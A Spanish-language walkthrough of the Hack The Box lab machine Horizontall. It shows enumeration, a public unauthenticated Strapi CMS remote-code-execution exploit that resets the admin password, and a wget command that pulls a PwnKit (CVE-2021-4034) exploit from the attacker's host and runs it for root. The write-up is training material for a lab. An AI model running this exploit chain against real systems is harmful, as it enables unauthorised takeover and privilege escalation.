Horizontall
Sobre esta maquina: HTB
Sistema Operativo: Linux
Skills Usados:
Information Leakage
Port Forwarding
Strapi CMS Exploitation
Laravel Exploitation
Metodologia:
Hacemos el primer escaneo del target.
//
nmap -T3 -sS -n -v 10.10.11.105 -oN first_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-27 20:05 EDT
Initiating Ping Scan at 20:05
Nmap scan report for 10.10.11.105
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds
Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.048KB)
Escaneo de servicios y ejecucion de scripts
❯ nmap -sC -sV -T3 -sS -n -p22,80 -v 10.10.11.105 -oN SC_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-27 20:07 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:07
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50
ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
|http-server-header: nginx/1.14.0 (Ubuntu)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Revisamos lo que corre en el puerto 80 .


//
nvim /etc/hosts

hacemos fuerza bruta con gobuster para enumerar subdominios.
//
❯ gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb/ -z -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://horizontall.htb/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: false
Starting gobuster in VHOST enumeration mode
===============================================================
found: api-prod.horizontall.htb

Enumeramos subdominios del mismo usando gobuster.
//
❯ gobuster dir -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://api-prod.horizontall.htb -t 50 -z
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://api-prod.horizontall.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
/admin (Status: 200) [Size: 854]
/users (Status: 403) [Size: 60]
/reviews (Status: 200) [Size: 507]
revisamos los subdominios encontrados, en el /reviews, encontramos un codigo json interesante.

ahora con searchsploit intentaremos conseguir alguna vulnerabilidad para Strapi.
//
searchsploit strapi
Exploit Title | Path
Strapi 3.0.0-beta - Set Password (Unauthenticated) | multiple/webapps/50237.py
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated) | multiple/webapps/50238.py
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) | multiple/webapps/50239.py
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit) | nodejs/webapps/50716.rb
Guardamos el exploit que mas nos gusto en este caso el 50239, cambiamos su nombre y lo ejecutamos.
//
searchsploit -m multiple/webapps/50239.py
❯ python3 strapy.explout.py
[-] Wrong number of arguments provided
[*] Usage: python3 exploit.py
❯ python3 strapy.explout.py http://api-prod.horizontall.htb
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNzQ1ODAyOTUwLCJleHAiOjE3NDgzOTQ5NTB9.DJvjPjeiRDNxOatzY6tWiJTxhjKp-60AWINFYtHGBRk
Comprobamos credenciales e INGRESAMOS EXITOSAMENTE .


Comprobamos si podemos inyectar comandos de forma remota desde la terminal.
//
❯$> whoami
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
{"statusCode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}
no nos dejo con NC pero nos fijamos que si nos deja ejecutar CURL, asi que intentaremos crear un index html y montar un servidor sencillo en python que nos permita hacer , que al ejectuar el index con curl en la maquina victima se nos envie una reverse shell estando en escucha .

Buscamos la Flag.
//
strapi@horizontall:~/myapi$ cd /home
strapi@horizontall:/home$ ls
developer
strapi@horizontall:/home$ cd developer
strapi@horizontall:/home/developer$ ls
composer-setup.php
myproject
user.txt
strapi@horizontall:/home/developer$ cat user.txt
a7493a7702747ee7f8b4300f17a9a1fa
Conseguimos la primera flag y ahora buscamos escalar privilegios.
Buscamos alternativas para hacer escalada de privilegios y encontramos lo siguiente:
//
trapi@horizontall:/home/developer$ which pkexec
/usr/bin/pkexec
Tiene pkexec y el comando make
lo que nos permitira ejecutar una CVE ya conocida
Ingresamos en los archivos temporales
strapi@horizontall:/home/developer$ cd /tmp/
Clonamos el CVE en nuestra maquina (no la victima)
para explotar la vulnerabilidad
git clone https://github.com/berdav/CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56 (from 1)
Receiving objects: 100% (92/92), 22.71 KiB | 394.00 KiB/s, done.
Resolving deltas: 100% (44/44), done.
Comrpimimos el exploit para mandarlo a la maquina victima
zip -r comprimido.zip CVE-2021-4034/
una vez comprimido el exploit habilitamos nuevamente el servidor python y desde la maquina victima con wget aceptamos la petición, descomprimimos el CVE hacemos make y ejectumos el exploit.

//
strapi@horizontall:~/myapi$ wget http://10.10.14.7/comprimido.zip
--2025-04-28 02:38:09-- http://10.10.14.7/comprimido.zip
Connecting to 10.10.14.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 52950 (52K) [application/zip]
Saving to: ‘comprimido.zip’
0K .......... .......... .......... .......... .......... 96% 161K 0s
50K . 100% 1.12M=0.3s
2025-04-28 02:38:09 (166 KB/s) - ‘comprimido.zip’ saved [52950/52950]
strapi@horizontall:~/myapi$ unzip comprimido.zip
strapi@horizontall:~/myapi$ cd CVE-2021-4034
strapi@horizontall:~/myapi/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
strapi@horizontall:~/myapi/CVE-2021-4034$ ./cve-2021-4034
whoami
root
y hemos ganado acceso a root, ahora buscamos la ultima flag.
//
cd /root
ls
boot.sh
pid
restart.sh
root.txt
cat root.txt
86dc856f7d9e662dced3806d29391a9d
Y así damos por concluida esta maquina.
Last updated